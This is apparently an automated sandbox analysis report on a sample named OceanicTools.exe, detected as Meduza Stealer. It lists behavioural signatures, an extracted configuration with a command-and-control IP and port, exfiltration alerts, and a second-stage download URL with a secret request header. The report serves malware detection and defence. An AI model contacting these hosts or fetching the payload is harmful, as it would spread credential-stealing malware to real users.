Windows Analysis Report
OceanicTools.exe

Overview

General Information

Sample name: OceanicTools.exe
Analysis ID: 1532355
MD5: f975ef6b34160bff3ba3c8c815f9e77c
SHA1: 4b818a41b68f8ed6f6719db14e19f955a60aebe8
SHA256: ae04f1bc929f6f83a4010f59fcc1f78caea5d198ae3779c7e058608effcc56af
Tags: exe, user-aachum

Detection

CredGrabber, Meduza Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected CredGrabber
Yara detected Meduza Stealer
Yara detected Powershell decode and execute
AI detected suspicious sample
Creates files in alternative data streams (ADS)
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Ping/Del Command Combination
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Terminates after testing mutex exists (may check infected machine status)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll Avira: detection malicious, Label: HEUR/AGEN.1354117
Source: 14.2.qflwedtkihuzyxlg.exe.140000000.0.raw.unpack Malware Configuration Extractor: Meduza Stealer {"C2 url": "79.137.202.152", "anti_vm": true, "anti_dbg": true, "port": 15666, "build_name": "Legenda", "self_destruct": true, "extensions": ".txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite", "links": "", "grabber_max_size": 1048576}
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.8% probability
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll Joe Sandbox ML: detected
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006FB80 CryptUnprotectData,LocalFree, 14_2_000000014006FB80
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140035E00 CryptUnprotectData,LocalFree, 14_2_0000000140035E00
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006FEA0 CryptProtectData,LocalFree, 14_2_000000014006FEA0
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: OceanicTools.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B6740 FindClose,FindFirstFileExW,GetLastError, 14_2_00000001400B6740
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B67F0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 14_2_00000001400B67F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D00F8 FindFirstFileW, 14_2_00000001400D00F8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007EF60 GetLogicalDriveStringsW, 14_2_000000014007EF60
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\migration\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\migration\wtr\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\hwvid-migration-2\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 4x nop then push rdi 11_2_00007FF6351DC950
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 4x nop then sub rsp, 28h 11_2_00007FF6351DC460
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 4x nop then sub rsp, 28h 14_2_00007FF6351DC460
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 4x nop then push rdi 14_2_00007FF6351DC950

Networking

Source: Network traffic Suricata IDS: 2049441 - Severity 1 - ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt : 192.168.2.5:49962 -> 79.137.202.152:15666
Source: Network traffic Suricata IDS: 2050806 - Severity 1 - ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2 : 192.168.2.5:49962 -> 79.137.202.152:15666
Source: Network traffic Suricata IDS: 2050807 - Severity 1 - ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) : 192.168.2.5:49962 -> 79.137.202.152:15666
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: global traffic TCP traffic: 192.168.2.5:49962 -> 79.137.202.152:15666
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Accept: text/html; text/plain; */* Host: api.ipify.org Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /phantomtoolsv2.exe HTTP/1.1 Host: 185.208.158.47 Accept-Encoding: gzip X-Secret-Phrase: AnalNosorog256
Source: Joe Sandbox View IP Address: 79.137.202.152
Source: Joe Sandbox View IP Address: 104.26.13.205
Source: Joe Sandbox View ASN Name: PSKSET-ASRU
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: api.ipify.org
Source: unknown TCP traffic detected without corresponding DNS query: 185.208.158.47
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007C5E0 recv,recv,closesocket,WSACleanup, 14_2_000000014007C5E0
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: OceanicTools.exe String found in binary or memory: http://185.208.158.47/phantomtoolsv2.exe
Source: OceanicTools.exe String found in binary or memory: http://185.208.158.47/phantomtoolsv2.exeAnalNosorog256X-Secret-Phrase
Source: powershell.exe, 00000009.00000002.2430659101.00000220FAA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000009.00000002.2430659101.00000220FAA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000005.00000002.2227145287.000001AA63A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.2227145287.000001AA63A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2
Source: OceanicTools.exe String found in binary or memory: http://https:///&?=-_.~:
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.a.0/sTy
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.a.0/sTyi
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.c.0/ti
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.c.0/tif
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.hotosh
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.hotoshi
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adoraw-se
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adoraw-sei
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2834681835.000001FB13695000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834648950.000001FB13694000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2834605604.000001FB13690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.photo/
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2654718716.000001FB13681000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.photo/i
Source: powershell.exe, 00000005.00000002.2221407009.000001AA5B74D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2205086606.000001AA4B906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.2205086606.000001AA4B6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2368510448.0000022080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2205086606.000001AA4B906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2227145287.000001AA63A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.micom/pki/certs/Miut_2010-06-23.cr
Source: powershell.exe, 00000009.00000002.2428854382.00000220FA8F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.2205086606.000001AA4B6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2368510448.0000022080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: qflwedtkihuzyxlg.exe, 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: qflwedtkihuzyxlg.exe, 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/8v
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: qflwedtkihuzyxlg.exe.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: powershell.exe, 00000009.00000002.2368510448.0000022080227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000005.00000002.2221407009.000001AA5B74D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2414199760.000002209006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E3F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673411537.000001FB139F3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FEE000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A92000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A45000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A9A000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673160053.000001FB12C88000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E47000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673160053.000001FB12C80000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CC8000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A3D000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680939696.000001FB1399B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2656578724.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657134772.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657312992.000001FB139DC000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2657277538.000001FB10E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: OceanicTools.exe String found in binary or memory: https://www.haskell.org/ghc/reportabug
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E3F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673411537.000001FB139F3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FEE000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A92000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A45000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A9A000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673160053.000001FB12C88000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E47000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673160053.000001FB12C80000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CC8000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A3D000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FF5000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13AA1000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CCF000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E4F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FF5000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13AA1000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CCF000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E4F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
